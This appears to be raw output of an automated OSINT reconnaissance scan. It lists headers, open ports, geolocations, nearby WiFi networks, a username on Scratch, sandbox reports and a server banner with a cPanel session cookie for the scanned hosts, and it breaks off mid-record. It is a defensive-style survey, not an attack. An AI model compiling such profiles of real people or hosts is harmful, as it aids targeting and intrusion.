| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-served-by: cache-ewr18140-EWR | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.226): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Kaesler (Net ID: 00:14:5C:86:BC:3E) | 50.8897, 6.0563 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.161): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | !function(e){var t={};function n(i){if(t[i])return t[i].exports;var r=t[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:i})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(n.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(i,r,function(t){return e[t]}.bind(null,r));return i},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=9)}([function(e,t,n){"use strict";n.d(t,"a",(function(){return s}));var i=n(4),r=n(7),a=new s,o=new r.a;function s(e,t,n){this.x=e||0,this.y=t||0,this.z=n||0}Object.assign(s.prototype,{isVector3:!0,set:function(e,t,n){return this.x=e,this.y=t,this.z=n,this},setScalar:function(e){return this.x=e,this.y=e,this.z=e,this},setX:function(e){return this.x=e,this},setY:function(e){return this.y=e,this},setZ:function(e){return this.z=e,this},setComponent:function(e,t){switch(e){case 0:this.x=t;break;case 1:this.y=t;break;case 2:this.z=t;break;default:throw new Error("index is out of range: "+e)}return this},getComponent:function(e){switch(e){case 0:return this.x;case 1:return this.y;case 2:return this.z;default:throw new Error("index is out of range: "+e)}},clone:function(){return new this.constructor(this.x,this.y,this.z)},copy:function(e){return this.x=e.x,this.y=e.y,this.z=e.z,this},add:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .add() now only accepts one argument. 
Use .addVectors( a, b ) instead."),this.addVectors(e,t)):(this.x+=e.x,this.y+=e.y,this.z+=e.z,this)},addScalar:function(e){return this.x+=e,this.y+=e,this.z+=e,this},addVectors:function(e,t){return this.x=e.x+t.x,this.y=e.y+t.y,this.z=e.z+t.z,this},addScaledVector:function(e,t){return this.x+=e.x*t,this.y+=e.y*t,this.z+=e.z*t,this},sub:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .sub() now only accepts one argument. Use .subVectors( a, b ) instead."),this.subVectors(e,t)):(this.x-=e.x,this.y-=e.y,this.z-=e.z,this)},subScalar:function(e){return this.x-=e,this.y-=e,this.z-=e,this},subVectors:function(e,t){return this.x=e.x-t.x,this.y=e.y-t.y,this.z=e.z-t.z,this},multiply:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .multiply() now only accepts one argument. Use .multiplyVectors( a, b ) instead."),this.multiplyVectors(e,t)):(this.x*=e.x,this.y*=e.y,this.z*=e.z,this)},multiplyScalar:function(e){return this.x*=e,this.y*=e,this.z*=e,this},multiplyVectors:function(e,t){return this.x=e.x*t.x,this.y=e.y*t.y,this.z=e.z*t.z,this},applyEuler:function(e){return e&&e.isEuler||console.error("THREE.Vector3: .applyEuler() now expects an Euler rotation rather than a Vector3 and order."),this.applyQuaternion(o.setFromEuler(e))},applyAxisAngle:function(e,t){return this.applyQuaternion(o.setFromAxisAngle(e,t))},applyMatrix3:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements;return this.x=r[0]*t+r[3]*n+r[6]*i,this.y=r[1]*t+r[4]*n+r[7]*i,this.z=r[2]*t+r[5]*n+r[8]*i,this},applyNormalMatrix:function(e){return this.applyMatrix3(e).normalize()},applyMatrix4:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements,a=1/(r[3]*t+r[7]*n+r[11]*i+r[15]);return this.x=(r[0]*t+r[4]*n+r[8]*i+r[12])*a,this.y=(r[1]*t+r[5]*n+r[9]*i+r[13])*a,this.z=(r[2]*t+r[6]*n+r[10]*i+r[14])*a,this},applyQuaternion:function(e){var t=this.x,n=this.y,i=this.z,r=e.x,a=e.y,o=e.z,s=e.w,l=s*t+a*i-o*n,c=s*n+o*t-r*i,u=s*i+r*n-a*t,h=-r*t-a*n-o*i;return 
this.x=l*s+h*-r+c*-o-u*-a,this.y=c*s+h*-a+u*-r-l*-o,this.z=u*s+h*-o+l*-a-c*-r,this},project:function(e){return this.applyMatrix4(e.matrixWorldInverse).applyMatrix4(e.projectionMatrix)},unproject:function(e){return this.applyMatrix4(e.projectionMatrixInverse).applyMatrix4(e.matrixWorld)},transformDirection:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements;return this.x=r[0]*t+r[4]*n+r[8]*i,this.y=r[1]*t+r[5]*n+r[9]*i,this.z=r[2]*t+r[6]*n+r[10]*i,this.normalize()},divide:function(e){return this.x/=e.x,this.y/=e.y,this.z/=e.z,this},divideScalar:function(e){return this.multiplyScalar(1/e)},min:function(e){return this.x=Math.min(this.x,e.x),this.y=Math.min(this.y,e.y),this.z=Math.min(this.z,e.z),this},max:function(e){return this.x=Math.max(this.x,e.x),this.y=Math.max(this.y,e.y),this.z=Math.max(this.z,e.z),this},clamp:function(e,t){return this.x=Math.max(e.x,Math.min(t.x,this.x)),this.y=Math.max(e.y,Math.min(t.y,this.y)),this.z=Math.max(e.z,Math.min(t.z,this.z)),this},clampScalar:function(e,t){return this.x=Math.max(e,Math.min(t,this.x)),this.y=Math.max(e,Math.min(t,this.y)),this.z=Math.max(e,Math.min(t,this.z)),this},clampLength:function(e,t){var n=this.length();return this.divideScalar(n||1).multiplyScalar(Math.max(e,Math.min(t,n)))},floor:function(){return this.x=Math.floor(this.x),this.y=Math.floor(this.y),this.z=Math.floor(this.z),this},ceil:function(){return this.x=Math.ceil(this.x),this.y=Math.ceil(this.y),this.z=Math.ceil(this.z),this},round:function(){return this.x=Math.round(this.x),this.y=Math.round(this.y),this.z=Math.round(this.z),this},roundToZero:function(){return this.x=this.x<0?Math.ceil(this.x):Math.floor(this.x),this.y=this.y<0?Math.ceil(this.y):Math.floor(this.y),this.z=this.z<0?Math.ceil(this.z):Math.floor(this.z),this},negate:function(){return this.x=-this.x,this.y=-this.y,this.z=-this.z,this},dot:function(e){return this.x*e.x+this.y*e.y+this.z*e.z},lengthSq:function(){return this.x*this.x+this.y*this.y+this.z*this.z},length:function(){return 
Math.sqrt(this.x*this.x+this.y*this.y+this.z*this.z)},manhattanLength:function(){return Math.abs(this.x)+Math.abs(this.y)+Math.abs(this.z)},normalize:function(){return this.divideScalar(this.length()||1)},setLength:function(e){return this.normalize().multiplyScalar(e)},lerp:function(e,t){return this.x+=(e.x-this.x)*t,this.y+=(e.y-this.y)*t,this.z+=(e.z-this.z)*t,this},lerpVectors:function(e,t,n){return this.subVectors(t,e).multiplyScalar(n).add(e)},cross:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .cross() now only accepts one argument. Use .crossVectors( a, b ) instead."),this.crossVectors(e,t)):this.crossVectors(this,e)},crossVectors:function(e,t){var n=e.x,i=e.y,r=e.z,a=t.x,o=t.y,s=t.z;return this.x=i*s-r*o,this.y=r*a-n*s,this.z=n*o-i*a,this},projectOnVector:function(e){var t=e.dot(this)/e.lengthSq();return this.copy(e).multiplyScalar(t)},projectOnPlane:function(e){return a.copy(this).projectOnVector(e),this.sub(a)},reflect:function(e){return this.sub(a.copy(e).multiplyScalar(2*this.dot(e)))},angleTo:function(e){var t=Math.sqrt(this.lengthSq()*e.lengthSq());0===t&&console.error("THREE.Vector3: angleTo() can't handle zero length vectors.");var n=this.dot(e)/t;return Math.acos(i.a.clamp(n,-1,1))},distanceTo:function(e){return Math.sqrt(this.distanceToSquared(e))},distanceToSquared:function(e){var t=this.x-e.x,n=this.y-e.y,i=this.z-e.z;return t*t+n*n+i*i},manhattanDistanceTo:function(e){return Math.abs(this.x-e.x)+Math.abs(this.y-e.y)+Math.abs(this.z-e.z)},setFromSpherical:function(e){return this.setFromSphericalCoords(e.radius,e.phi,e.theta)},setFromSphericalCoords:function(e,t,n){var i=Math.sin(t)*e;return this.x=i*Math.sin(n),this.y=Math.cos(t)*e,this.z=i*Math.cos(n),this},setFromCylindrical:function(e){return this.setFromCylindricalCoords(e.radius,e.theta,e.y)},setFromCylindricalCoords:function(e,t,n){return this.x=e*Math.sin(t),this.y=n,this.z=e*Math.cos(t),this},setFromMatrixPosition:function(e){var t=e.elements;return 
this.x=t[12],this.y=t[13],this.z=t[14],this},setFromMatrixScale:function(e){var t=this.setFromMatrixColumn(e,0).length(),n=this.setFromMatrixColumn(e,1).length(),i=this.setFromMatrixColumn(e,2).length();return this.x=t,this.y=n,this.z=i,this},setFromMatrixColumn:function(e,t){return this.fromArray(e.elements,4*t)},equals:function(e){return e.x===this.x&&e.y===this.y&&e.z===this.z},fromArray:function(e,t){return void 0===t&&(t=0),this.x=e[t],this.y=e[t+1],this.z=e[t+2],this},toArray:function(e,t){return void 0===e&&(e=[]),void 0===t&&(t=0),e[t]=this.x,e[t+1]=this.y,e[t+2]=this.z,e},fromBufferAttribute:function(e,t,n){return void 0!==n&&console.warn("THREE.Vector3: offset has been removed from .fromBufferAttribute()."),this.x=e.getX(t),this.y=e.getY(t),this.z=e.getZ(t),this}})},function(e,t,n){"use strict";n.d(t,"a",(function(){return o}));var i=n(3),r=n(2),a=n(6),o={common:{diffuse:{value:new i.a(15658734)},opacity:{value:1},map:{value:null},uvTransform:{value:new a.a},uv2Transform:{value:new a.a},alphaMap:{value:null}},specularmap:{specularMap:{value:null}},envmap:{envMap:{value:null},flipEnvMap:{value:-1},reflectivity:{value:1},refractionRatio:{value:.98},maxMipLevel:{value:0}},aomap:{aoMap:{value:null},aoMapIntensity:{value:1}},lightmap:{lightMap:{value:null},lightMapIntensity:{value:1}},emissivemap:{emissiveMap:{value:null}},bumpmap:{bumpMap:{value:null},bumpScale:{value:1}},normalmap:{normalMap:{value:null},normalScale:{value:new r.a(1,1)}},displacementmap:{displacementMap:{value:null},displacementScale:{value:1},displacementBias:{value:0}},roughnessmap:{roughnessMap:{value:null}},metalnessmap:{metalnessMap:{value:null}},gradientmap:{gradientMap:{value:null}},fog:{fogDensity:{value:25e-5},fogNear:{value:1},fogFar:{value:2e3},fogColor:{value:new 
i.a(16777215)}},lights:{ambientLightColor:{value:[]},lightProbe:{value:[]},directionalLights:{value:[],properties:{direction:{},color:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{}}},directionalShadowMap:{value:[]},directionalShadowMatrix:{value:[]},spotLights:{value:[],properties:{color:{},position:{},direction:{},distance:{},coneCos:{},penumbraCos:{},decay:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{}}},spotShadowMap:{value:[]},spotShadowMatrix:{value:[]},pointLights:{value:[],properties:{color:{},position:{},decay:{},distance:{},shadow:{},shadowBias:{},shadowRadius:{},shadowMapSize:{} | https://battleb0t.xyz/main.built.js |
| 2023-05-12 02:58:18 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [u'52.217.192.16', u'34.148.97.127', u'108.139.0.107', u'54.205.240.192'], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://support.freshping.io/en/support/solutions/articles/237621', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_a34_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_a34_ConnHashTable<2612>_HashTable_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2612"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_a34_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_a34_IESQMMUTEX_0_331"\n "IsoScope_a34_IESQMMUTEX_0_303"\n "IsoScope_a34_IE_EarlyTabStart_0xdf0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, 
u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"o.ss2.us"\n "ocsp.pki.goog"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "freshworks-portal.netlify.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.208.180.173:443"\n "108.138.247.6:443"\n "172.253.63.95:443"\n "52.217.192.16:443"\n "108.138.245.91:80"\n "172.217.14.195:80"\n "108.139.0.48:80"\n "108.139.0.178:80"\n "108.138.245.195:80"\n "172.217.14.195:443"\n "34.148.97.127:443"\n "108.138.246.25:443"\n "108.139.0.107:443"\n "54.205.240.192:443"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"57C8EDB95DF3F0AD4EE2DC2B8CFD4157" has type "Microsoft Cabinet archive data 4817 bytes 1 file"\n "CabFB10.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n 
"ajax-loader_1_.gif" has type "GIF image data version 89a 18 x 18"- [targetUID: N/A]\n "related_articles_1_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002556]\n "6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDQ_1_.woff" has type "Web Open Font Format TrueType length 15704 version 1.1"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00002556]\n "icon-sprites-2_1_.png" has type "PNG image data 300 x 72 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "portal_print-a389f1ef3e87261e7264e3e70416d704_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "pxiByp8kv8JHgFVrLCz7Z1xlEw_1_.woff" has type "Web Open Font Format TrueType length 10436 version 1.1"- [targetUID: N/A]\n "portal_utils-036d877ee9df92b844f3f7e66e6b41af_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "7D6243C18F0F8F9AEC6638DD210F1984_B13E2B48FEEE7ABC0415719489CB444D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7D6243C18F0F8F9AEC6638DD210F1984_B13E2B48FEEE7ABC0415719489CB444D]- [targetUID: 00000000-00002556]\n "BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894]- [targetUID: 00000000-00002556]\n "2ZG9LS53.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2ZG9LS53.txt]- [targetUID: 00000000-00002612]\n "icomoon_1_.ttf" has type "TrueType Font data 11 tables 1st "OS/2" 14 names Macintosh type 1 string icomoon "- 
[targetUID: N/A]\n "~DF0BFC9FC40A762D44.TMP" has type "data"- Location: [%TEMP%\\~DF0BFC9FC40A762D44.TMP]- [targetUID: 00000000-00002612]\n "~DFF5791F511DCFC9C7.TMP" has type "data"- Location: [%TEMP%\\~DFF5791F511DCFC9C7.TMP]- [targetUID: 00000000-00002612]\n "6xKydSBYKcSV-LCoeQqfX1RYOo3i54rwlxdo_1_.woff" has type "Web Open Font Format TrueType length 16116 version 1.1"- [targetUID: N/A]\n "RecoveryStore._AE7F9723-1A2D-11ED-A081-0800271F92EE_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "theme_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "~DF19E56798D5DFA061.TMP" has type "data"- Location: [%TEMP%\\~DF19E56798D5DFA061.TMP]- [targetUID: 00000000-00002612]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Found decrypted SSL traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /en/support/solutions/articles/237621 HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: support.freshping.io\nDNT: 1\nConnection: Keep-Alive"- [Source: SSL_3.208.180.173] | 34.148.97.127 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/withat_3.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:36:57 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | Tehran, Iran | 87.248.157.102 |
| 2023-05-12 02:54:27 | HTTP Headers | No | Censys | 0 | 0 | 4 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "Server": ["Netlify"], "X_Nf_Request_Id": ["01H04XFP518R0GMRXREDYN35MZ"], "Date": ["<REDACTED>"]} | 2600:1f18:2489:8202::c8 |
| 2023-05-12 03:41:36 | Physical Location | No | AbstractAPI | 1 | 0 | 3 | 0 | None | Eygelshoven, Limburg, 6471, Netherlands, Europe | 45.131.109.53 |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.36): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | scratch (Category: coding)
https://scratch.mit.edu/users/ayshoo/ | ayshoo |
| 2023-05-12 03:09:47 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 71.170.74.34.bc.googleusercontent.com | 34.74.170.71 |
| 2023-05-12 03:09:28 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | 165.232.113.85:443 | 165.232.113.85 |
| 2023-05-12 02:54:51 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 34.74.170.74:443 | 34.74.170.74 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MobileInternet (Net ID: 00:02:B3:AE:E3:34) | 50.1188, 8.6843 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: cpsession=%3a1TMQH6MZEuqlLsFz%2c7387de1c8dd6f13e5f0cbf314c13b1f5; HttpOnly; path=/; port=2082
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2082
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12486
| 87.248.157.102 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-cache-hits: 1 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:55:16 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://vismliko.github.io/runssitory/index.html', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar5362.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar54FB.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"connectenligne.derlma.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "34.125.187.102:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, 
u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_ff8_ConnHashTable<4088>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_ff8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_ff8_IE_EarlyTabStart_0xf3c_Mutex"\n "UpdatingNewTabPageData"\n "IsoScope_ff8_IESQMMUTEX_0_303"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab54EA.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab5361.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', 
